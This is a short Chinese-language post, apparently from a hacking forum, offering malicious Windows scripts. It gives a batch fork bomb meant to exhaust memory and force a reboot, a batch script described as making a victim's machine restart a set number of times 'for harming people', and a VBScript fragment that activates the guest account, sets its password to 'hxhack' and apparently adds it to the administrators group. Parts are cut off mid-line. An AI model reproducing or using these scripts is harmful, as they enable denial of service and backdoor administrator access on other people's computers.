第一个:让别人内存OVER(逼他重启)
@echo off
start cmd
%0
就这3行了
第二个:让对方重启指定次数(害人专用)
@echo off
if not exist c:1.txt echo. c:1.txt & goto err1
if not exist c:2.txt echo. ...……
dim wsh
set wsh=createobject(wscript.shell)
wsh.run net user guest /active:yes,0 (激活guest账号)
wsh.run net user guest hxhack,0 (修改guest密码为hxhack)
wsh.run net localgroup administrato ...……